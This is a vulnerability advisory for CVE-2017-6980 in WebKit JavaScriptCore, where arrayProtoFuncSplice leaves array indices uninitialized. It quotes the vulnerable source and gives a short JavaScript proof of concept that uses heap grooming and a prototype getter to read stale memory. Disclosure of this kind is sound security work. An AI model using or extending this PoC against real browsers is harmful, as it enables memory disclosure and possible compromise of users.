WebKit JSC arrayProtoFuncSplice Initialization Fail

Published
Credit
Risk
2017.06.16
lokihardt
Medium
CWE
CVE
Local
Remote
N/A
CVE-2017-6980
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.8/10
6.4/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

WebKit: JSC: arrayProtoFuncSplice doesn't initialize all indices.

CVE-2017-6980


Here's a snippet of arrayProtoFuncSplice.

EncodedJSValue JSC_HOST_CALL arrayProtoFuncSplice(ExecState* exec)
{
...
result = JSArray::tryCreateForInitializationPrivate(vm, exec->lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(ArrayWithUndecided), actualDeleteCount);
if (!result)
return JSValue::encode(throwOutOfMemoryError(exec, scope));

for (unsigned k = 0; k < actualDeleteCount; ++k) {
JSValue v = getProperty(exec, thisObj, k + actualStart);
RETURN_IF_EXCEPTION(scope, encodedJSValue());
if (UNLIKELY(!v)) {
continue;
}
result->initializeIndex(vm, k, v);
}
...
}

|JSArray::tryCreateForInitializationPrivate| will return an uninitalized JSArray. So the next routine must clear its all indices. But the routine skips holes in |thisObj|. This is fine under normal circumstances because the type of |result| will be ArrayWithUndecided, unless you're having a bad time. We can force |result|'s type to ArrayWithSlowPutArrayStorage by using |JSGlobalObject::haveABadTime|.

PoC:
function gc() {
for (let i = 0; i < 0x10; i++)
new ArrayBuffer(0x1000000);
}

Array.prototype.__defineGetter__(0x1000, () => 1);

gc();

for (let i = 0; i < 0x100; i++) {
new Array(0x100).fill(1234.5678);
}

gc();

print(new Array(0x100).splice(0));



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com